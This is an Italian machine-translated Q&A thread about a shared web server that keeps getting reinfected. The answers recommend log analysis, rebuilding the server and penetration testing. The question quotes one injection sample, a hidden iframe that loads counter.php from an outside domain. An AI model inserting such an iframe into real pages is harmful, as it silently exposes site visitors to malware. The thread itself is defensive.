Come trovare i siti vulnerabili su un server web

Naviga le tue risposte
1

Un mio cliente ha un VPS gestito con dozzine di siti web, forse anche centinaia. Ora il suo server continua a essere infettato regolarmente. Gli amministratori di webhost / server continuano a scavare nell'oscurità. Eseguono una scansione mensile, rimuovono il software infetto, ma non sono in grado di dire da quali siti ha origine come i file di registro sembrano essere puliti.

Utilizza cuteFtp Pro con crittografia password, quindi probabilmente non è collegato all'FTP.

È un sistema LAMP con installazioni Apache e PHP / MySQL aggiornate.

Ora ci sono modi o strumenti per analizzare l'intero server alla ricerca di vulnerabilità, senza controllare manualmente ciascun sito web? È possibile che ci siano alcune vecchie applicazioni WordPress lì, ma ci vorrebbero anni per controllare individualmente ogni sito web.

Uno dei look per le infezioni piace questo: 

</html>
<iframe src="http://autobedrijfboekema.nl/counter.php"style="visibility: hidden; position: absolute; left: 0px; top: 0px"
        width="10" height="10"/>
    
posta destiny 06.09.2013 - 12:56
fonte

3 risposte

1

He uses cuteFtp Pro with password encryption so it's probably not FTP related.

sicuro? ci sono malware per il furto di password ftp per la protezione degli sviluppatori esterni che cercano localmente ftp-credentails.

  • cosa intendi per "infetto"? caricamenti dannosi? sql-iniezioni?
  • chi / quanti sviluppatori hanno accesso a quel server?

da quel numero di installazioni devi essere fortunato o essere in grado di identificare i vettori di attacco attraverso la correlazione del log, ma questo richiede una certa esperienza nel farlo.

regola n. 1 se si stanno eseguendo siti Web con connessione Internet: essere aggiornati con ogni applicazione distribuita e il proprio server-os.

    
risposta data 06.09.2013 - 13:08
fonte
1

Non esiste un modo semplice per risolvere questo problema. In questo caso l'utilizzo di strumenti automatici non verrà eseguito; Capisco che questo server è enorme come nella quantità di siti che ospita.

In senso stretto, se un server è compromesso, non vi è alcuna garanzia reale che verrà pulito: l'unico approccio affidabile è quello di nuotare e ricostruire da una fonte attendibile conosciuta.

Se nuking e rebuild non sono un'opzione e il tuo server continua a essere hackerato, dovrai adottare un approccio programmatico per valutare i punti in cui potrebbero insorgere vulnerabilità e chiudere ogni singolo gap.

La chiave qui è test di sicurezza manuale, vale a dire test di penetrazione, build review e analisi del traffico.

Vorrei iniziare con una valutazione della sicurezza dell'infrastruttura di rete interna, seguita da una revisione della compilazione dei file di configurazione dei sistemi operativi e dei box. Toppa e stringi tutto. Una volta fatto, puoi passare al test di penetrazione su un livello superiore (Web).

In sintesi, l'approccio migliore sarebbe il nuking e la ricostruzione, anche se costerebbe un po 'di tempo e denaro, potrebbe essere ancora più economico di eseguire un test di penetrazione completo a tutti i livelli. Se, d'altra parte, tempo e risorse per questo tipo di ricostruzione sono impossibili, allora l'unica soluzione è pentestare tutto; così tempo Vs soldi, direi.

    
risposta data 06.09.2013 - 15:55
fonte
0

Prima di tutto, no , non esiste un modo automatico per trovare malware. E se ci fosse, diventerebbe immediatamente obsoleto nel momento in cui un autore di malware l'ha visto, poiché l'attaccante cambia la sua strategia per abbinare il difensore.

In secondo luogo, potrebbe sicuramente essere correlato alla password. Se il tuo amministratore ha malware sulla sua workstation o sulla sua rete, potrebbe perdere la password all'autore dell'attacco. Questo è molto comune E un antivirus non è una soluzione. Qualsiasi autore di malware remotamente esperto può eludere tutti i prodotti antivirus.

In terzo luogo, controlla i tuoi registri. Guarda le date sui file appena modificati e poi controlla i tuoi registri per vedere cosa è successo in quel momento / data. Questo include i log FTP e HTTP.

In quarto luogo, cerca un aiuto professionale. Ci sono molte persone che si guadagnano da vivere risolvendo esattamente questo tipo di problema. Ottenere le cose giuste richiede pratica ed esperienza, e alcuni di noi lo fanno da molto tempo.

    
risposta data 06.09.2013 - 23:47
fonte

Leggi altre domande sui tag

applicazioni di doppio DES e triple DES Come eseguire l'autenticazione su racoon con una catena di certificati se è nota solo la CA radice